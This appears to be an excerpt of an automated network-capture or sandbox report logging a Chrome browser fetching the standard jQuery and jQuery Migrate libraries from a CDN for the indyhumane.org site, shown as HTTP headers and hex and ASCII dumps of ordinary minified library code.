                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 87553
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/jquery.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 28 Aug 2023 17:14:23 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC742INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                        Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 65 3d 3d 3d 65 2e 77 69 6e 64 6f 77 7d 2c 43 3d 69 65 2e 64 6f 63 75 6d 65 6e 74 2c 75 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 28 6e 3d 6e 7c 7c 43 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d
                                                                                                                                                                                                                                                        Data Ascii: e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.rem
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67
                                                                                                                                                                                                                                                        Data Ascii: length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.leng
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 63 28 4f 62 6a 65 63 74 28 65 29 29 3f 63 65 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 73 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                                                                        Data Ascii: makeArray:function(e,t){var n=t||[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documen
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 61 70 65 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 2b 22 22 29 2e 72 65 70 6c 61 63 65 28 66 2c 70 29 7d 3b 76 61 72 20 79 65 3d 43 2c 6d 65 3d 73 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 62 2c 77 2c 6f 2c 61 2c 54 2c 72 2c 43 2c 64 2c 69 2c 6b 3d 6d 65 2c 53 3d 63 65 2e 65 78 70 61 6e 64 6f 2c 45 3d 30 2c 6e 3d 30 2c 73 3d 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61
                                                                                                                                                                                                                                                        Data Ascii: apeSelector=function(e){return(e+"").replace(f,p)};var ye=C,me=s;!function(){var e,b,w,o,a,T,r,C,d,i,k=me,S=ce.expando,E=0,n=0,s=W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disa
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 67 65 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c
                                                                                                                                                                                                                                                        Data Ascii: xp("\\\\[\\da-fA-F]{1,6}"+ge+"?|\\\\([^\\r\\n\\f])","g"),P=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 72 65 28 74 2e 72 65 70 6c 61 63 65 28 76 65 2c 22 24 31 22 29 2c 65 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 76 61 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65
                                                                                                                                                                                                                                                        Data Ascii: ibute("id")}}}return re(t.replace(ve,"$1"),e,n,r)}function W(){var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 74 65 64 4d 61 74 63 68 3d 24 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 7d 29 2c 6c 65 2e 73 63 6f 70 65 3d 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 2c 6c 65 2e 63 73 73 48 61 73 3d 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29
                                                                                                                                                                                                                                                        Data Ascii: tedMatch=$(function(e){return i.call(e,"*")}),le.scope=$(function(){return T.querySelectorAll(":scope")}),le.cssHas=$(function(){try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P)
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 28 22 5b 69 64 7e 3d 22 2b 53 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29
                                                                                                                                                                                                                                                        Data Ascii: ("[id~="+S+"-]").length||d.push("~="),e.querySelectorAll("a#"+S+"+*").length||d.push(".#.+[+~]"),e.querySelectorAll(":checked").length||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D")
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 29 3b 76 61 72 20 6e 3d 62 2e 61 74 74 72 48 61 6e 64 6c 65 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 72 3d 6e 26 26 75 65 2e 63 61 6c 6c 28 62 2e 61 74 74 72 48 61 6e 64 6c 65 2c 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 6e 28 65 2c 74 2c 21 43 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d
                                                                                                                                                                                                                                                        Data Ascii: );var n=b.attrHandle[t.toLowerCase()],r=n&&ue.call(b.attrHandle,t.toLowerCase())?n(e,t,!C):void 0;return void 0!==r?r:e.getAttribute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[]


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        9192.168.2.449758192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC580OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC635INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 13577
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/jquery-migrate.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 09 Jun 2023 05:49:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC734INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                                                                                                                                                        Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 73 2e 6d 69 67 72 61 74 65 45 6e 61 62 6c 65 50 61 74 63 68 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 64 65 6c 65 74 65 20 74 5b 61 72 67 75 6d 65 6e 74 73 5b 65 5d 5d 7d 2c 73 2e 6d 69 67 72 61 74 65 49 73 50 61 74 63 68 45 6e 61 62 6c 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 74 5b 65 5d 7d 2c 6e 2e 63 6f 6e 73 6f 6c 65 26 26 6e 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 26 26 28 73 26 26 65 28 22 33 2e 30 2e 30 22 29 26 26 21 65 28 22 35 2e 30 2e 30 22 29 7c 7c 6e 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 6a 51 75 65 72 79 20 33 2e 78 2d 34 2e 78 20 52 45 51 55 49 52 45 44 22 29 2c 73 2e 6d 69 67 72
                                                                                                                                                                                                                                                        Data Ascii: s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migr
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 2c 6d 3d 73 2e 66 6e 2e 69 6e 69 74 2c 79 3d 73 2e 66 69 6e 64 2c 68 3d 2f 5c 5b 28 5c 73 2a 5b 2d 5c 77 5d 2b 5c 73 2a 29 28 5b 7e 7c 5e 24 2a 5d 3f 3d 29 5c 73 2a 28 5b 2d 5c 77 23 5d 2a 3f 23 5b 2d 5c 77 23 5d 2a 29 5c 73 2a 5c 5d 2f 2c 67 3d 2f 5c 5b 28 5c 73 2a 5b 2d 5c 77 5d 2b 5c 73 2a 29 28 5b 7e 7c 5e 24 2a 5d 3f 3d 29 5c 73 2a 28 5b 2d 5c 77 23 5d 2a 3f 23 5b 2d 5c 77 23 5d 2a 29 5c 73 2a 5c 5d 2f 67 2c 76 3d 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 7c 28 5b 5e 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 29 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30 5d 2b 24 2f 67 3b 66 6f 72 28 64 20 69 6e 20 69 28 73 2e 66 6e 2c 22 69 6e 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69
                                                                                                                                                                                                                                                        Data Ascii: ,m=s.fn.init,y=s.find,h=/\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/,g=/\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/g,v=/^[\s\uFEFF\xA0]+|([^\s\uFEFF\xA0])[\s\uFEFF\xA0]+$/g;for(d in i(s.fn,"init",function(e){var t=Array.prototype.sli
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 75 6e 69 71 75 65 53 6f 72 74 22 29 2c 72 28 73 2e 65 78 70 72 2c 22 66 69 6c 74 65 72 73 22 2c 73 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 22 65 78 70 72 2d 70 72 65 2d 70 73 65 75 64 6f 73 22 2c 22 6a 51 75 65 72 79 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 22 29 2c 72 28 73 2e 65 78 70 72 2c 22 3a 22 2c 73 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 22 65 78 70 72 2d 70 72 65 2d 70 73 65 75 64 6f 73 22 2c 22 6a 51 75 65 72 79 2e 65 78 70 72 5b 27 3a 27 5d 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 22 29 2c 65
                                                                                                                                                                                                                                                        Data Ascii: recated; use jQuery.uniqueSort"),r(s.expr,"filters",s.expr.pseudos,"expr-pre-pseudos","jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"),r(s.expr,":",s.expr.pseudos,"expr-pre-pseudos","jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"),e
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 22 61 6a 61 78 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6c 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 65 2e 70 72 6f 6d 69 73 65 26 26 28 63 28 65 2c 22 73 75 63 63 65 73 73 22 2c 65 2e 64 6f 6e 65 2c 22 6a 71 58 48 52 2d 6d 65 74 68 6f 64 73 22 2c 22 6a 51 58 48 52 2e 73 75 63 63 65 73 73 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 22 29 2c 63 28 65 2c 22 65 72 72 6f 72 22 2c 65 2e 66 61 69 6c 2c 22 6a 71 58 48 52 2d 6d 65 74 68 6f 64 73 22 2c 22 6a 51 58 48 52 2e 65 72 72 6f 72 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 22 29 2c 63 28 65 2c 22 63 6f 6d 70 6c 65 74 65 22 2c 65 2e 61 6c 77 61 79 73 2c 22 6a 71 58 48 52 2d 6d
                                                                                                                                                                                                                                                        Data Ascii: "ajax",function(){var e=l.apply(this,arguments);return e.promise&&(c(e,"success",e.done,"jqXHR-methods","jQXHR.success is deprecated and removed"),c(e,"error",e.fail,"jqXHR-methods","jQXHR.error is deprecated and removed"),c(e,"complete",e.always,"jqXHR-m
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 3d 74 26 26 73 2e 64 61 74 61 28 74 68 69 73 2c 22 5f 5f 63 6c 61 73 73 4e 61 6d 65 5f 5f 22 29 7c 7c 22 22 29 7d 29 29 7d 2c 22 74 6f 67 67 6c 65 43 6c 61 73 73 2d 62 6f 6f 6c 22 29 3b 76 61 72 20 51 2c 41 2c 52 3d 21 31 2c 43 3d 2f 5e 5b 61 2d 7a 5d 2f 2c 4e 3d 2f 5e 28 3f 3a 42 6f 72 64 65 72 28 3f 3a 54 6f 70 7c 52 69 67 68 74 7c 42 6f 74 74 6f 6d 7c 4c 65 66 74 29 3f 28 3f 3a 57 69 64 74 68 7c 29 7c 28 3f 3a 4d 61 72 67 69 6e 7c 50 61 64 64 69 6e 67 29 3f 28 3f 3a 54 6f 70 7c 52 69 67 68 74 7c 42 6f 74 74 6f 6d 7c 4c 65 66 74 29 3f 7c 28 3f 3a 4d 69 6e 7c 4d 61 78 29 3f 28 3f 3a 57 69 64 74 68 7c 48 65 69 67 68 74 29 29 24 2f 3b 73 2e 73 77 61 70 26 26 73 2e 65 61 63 68 28 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 2c 22 72 65 6c 69 61 62 6c
